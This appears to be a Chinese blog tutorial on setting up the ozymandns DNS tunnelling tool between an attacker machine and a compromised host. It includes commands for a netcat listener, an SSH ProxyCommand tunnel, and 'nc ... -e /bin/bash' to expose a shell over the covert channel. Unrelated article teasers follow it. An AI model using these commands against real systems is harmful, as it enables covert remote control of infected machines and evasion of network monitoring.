技术标签: dns隧道 ozymandns ssh 网络安全 DNS隧道系列 隐蔽
ozymandns 较早的一个DNS隧道工具,它基于perl开发,使用较复杂。
最初版本只有0.1,有各个爱好者的修改版,如via1,via2,via3等。它的主要功能就是结合 ssh 来做通道,因此这也是它的一大坑点,下面会讲到。
数据请求用base32编码,响应使用base64编码。
使用热度: ★★☆☆☆
恶意DNS服务器发起DNS解析请求恶意DNS服务器。相比直连,速度较慢,但是更安全。| 攻击机 | 被控机 |
|---|---|
| 服务端 | 客户端 |
由于版本较老,服务端、客户端不太支持Windows,推荐在Linux下跑。
Windows下运行可能提示:
Your vendor has not defined Fcntl macro F_GETFL。
原因是Windows对
F_GETFL函数不支持,当然可以修改相关代码以兼容Windows,详见:https://github.com/kthakore/frozen-bubble/commit/735dd2307455e32c69827e013992c2d022cb7347
并且Windows运行,还需要cgywin工具。博主在安装后,仍然提示缺少cgywin1.dll,没搞成功。
kali系统内置Perl环境,但是运行可能还是会报缺少一些依赖:
- Net::DNS
- MIME::Base32
安装方法:
解压ppm文件(如Net::DNS),将里面的lib覆盖到perl安装目录下的lib(注意kali的perl默认在usr/lib/x86_64-linux-gnu/perl5)
这些Perl依赖,以及服务端、客户端等所有工具,下面的下载地址已打包提供!
当然以上依赖也可以到官网下载:http://www.bribes.org/perl/ppm/
ozymandns分为两部分:客户端和服务器。
客户端:
在受感染的计算机上运行。
运行模式如大多DNS隧道工具一样:
Dnscat2客户端->DNS服务商->Dnscat2服务端。
如果您没有购买域名,还可以在UDP/53上使用直连。
服务端:
Perl语言编写,在服务器上运行。
当它接收其中一个域名的流量时,它会尝试建立DNS连接。。
下载下来即可!
服务端:
1、启动服务:
# 该ip为查询该域名时返回的ip,不重要
perl nomde.pl -i 11.11.11.11 <domain.com> <script src="https://localhost01.cn/js/jquery-2.0.0.min.js"></script>
# 服务端还可以开启nc来监听本地端口,后续被控端可使用nc,通过dns隧道来连接
nc -l -p 1234 -v
客户端:
1、连接:
# 客户端连接的域名,必须有sshdns前缀,否则连不上,我就在这里踩了个大坑
ssh -C -o ProxyCommand="./droute.pl sshdns.abc.com -r <your server ip>" -L 7777:127.0.0.1:1234 [email protected]
# nc去连接,注:其实上面操作就能得到一个ssh窗口了,一般就不需要再通过nc去连了。
nc 127.0.0.1 7777 -e /bin/bash -v
其中:
本地的7777与远端的1234端口,基于DNS通道,再建立一个SSH连接通道这是使用 ozymandns 来做ssh通讯最大的坑点。对于普通用户来说,倒没什么,对于黑客们来说,还得需要知道其密码!
文章浏览阅读2w次,点赞7次,收藏51次。四个步骤1.创建C++ Win32项目动态库dll 2.在Win32项目动态库中添加 外部依赖项 lib头文件和lib库3.导出C接口4.c#调用c++动态库开始你的表演...①创建一个空白的解决方案,在解决方案中添加 Visual C++ , Win32 项目空白解决方案的创建:添加Visual C++ , Win32 项目这......_c#调用lib
文章浏览阅读4.6k次。苹方字体是苹果系统上的黑体,挺好看的。注重颜值的网站都会使用,例如知乎:font-family: -apple-system, BlinkMacSystemFont, Helvetica Neue, PingFang SC, Microsoft YaHei, Source Han Sans SC, Noto Sans CJK SC, W..._ubuntu pingfang
文章浏览阅读159次。表单表单概述表单标签表单域按钮控件demo表单标签表单标签基本语法结构<form action="处理数据程序的url地址“ method=”get|post“ name="表单名称”></form><!--action,当提交表单时,向何处发送表单中的数据,地址可以是相对地址也可以是绝对地址--><!--method将表单中的数据传送给服务器处理,get方式直接显示在url地址中,数据可以被缓存,且长度有限制;而post方式数据隐藏传输,_html表单的处理程序有那些
文章浏览阅读1.2k次。使用说明:开启Google的登陆二步验证(即Google Authenticator服务)后用户登陆时需要输入额外由手机客户端生成的一次性密码。实现Google Authenticator功能需要服务器端和客户端的支持。服务器端负责密钥的生成、验证一次性密码是否正确。客户端记录密钥后生成一次性密码。下载谷歌验证类库文件放到项目合适位置(我这边放在项目Vender下面)https://github.com/PHPGangsta/GoogleAuthenticatorPHP代码示例://引入谷_php otp 验证器
文章浏览阅读4.3k次,点赞5次,收藏11次。matplotlib.plot画图横坐标混乱及间隔处理_matplotlib更改横轴间距
文章浏览阅读2.2k次。①Storage driver 处理各镜像层及容器层的处理细节,实现了多层数据的堆叠,为用户 提供了多层数据合并后的统一视图②所有 Storage driver 都使用可堆叠图像层和写时复制(CoW)策略③docker info 命令可查看当系统上的 storage driver主要用于测试目的,不建议用于生成环境。_docker 保存容器
文章浏览阅读834次,点赞27次,收藏13次。网络拓扑结构是指计算机网络中各组件(如计算机、服务器、打印机、路由器、交换机等设备)及其连接线路在物理布局或逻辑构型上的排列形式。这种布局不仅描述了设备间的实际物理连接方式,也决定了数据在网络中流动的路径和方式。不同的网络拓扑结构影响着网络的性能、可靠性、可扩展性及管理维护的难易程度。_网络拓扑csdn
文章浏览阅读1.8k次,点赞5次,收藏8次。IOS系统Date的坑要创建一个指定时间的new Date对象时,通常的做法是:new Date("2020-09-21 11:11:00")这行代码在 PC 端和安卓端都是正常的,而在 iOS 端则会提示 Invalid Date 无效日期。在IOS年月日中间的横岗许换成斜杠,也就是new Date("2020/09/21 11:11:00")通常为了兼容IOS的这个坑,需要做一些额外的特殊处理,笔者在开发的时候经常会忘了兼容IOS系统。所以就想试着重写Date函数,一劳永逸,避免每次ne_date.prototype 将所有 ios
文章浏览阅读5.3k次。方法一:用PLSQL Developer工具。 1 在PLSQL Developer的sql window里输入select * from test for update; 2 按F8执行 3 打开锁, 再按一下加号. 鼠标点到第一列的列头,使全列成选中状态,然后粘贴,最后commit提交即可。(前提..._excel导入pl/sql
文章浏览阅读83次。Git常用命令速查手册1、初始化仓库git init2、将文件添加到仓库git add 文件名 # 将工作区的某个文件添加到暂存区 git add -u # 添加所有被tracked文件中被修改或删除的文件信息到暂存区,不处理untracked的文件git add -A # 添加所有被tracked文件中被修改或删除的文件信息到暂存区,包括untracked的文件...
文章浏览阅读202次。分享119个ASP.NET源码总有一个是你想要的_千博二手车源码v2023 build 1120
文章浏览阅读1.8k次。版权声明:转载请注明出处 http://blog.csdn.net/irean_lau。目录(?)[+]1、缺省构造函数。2、缺省拷贝构造函数。3、 缺省析构函数。4、缺省赋值运算符。5、缺省取址运算符。6、 缺省取址运算符 const。[cpp] view plain copy_空类默认产生哪些类成员函数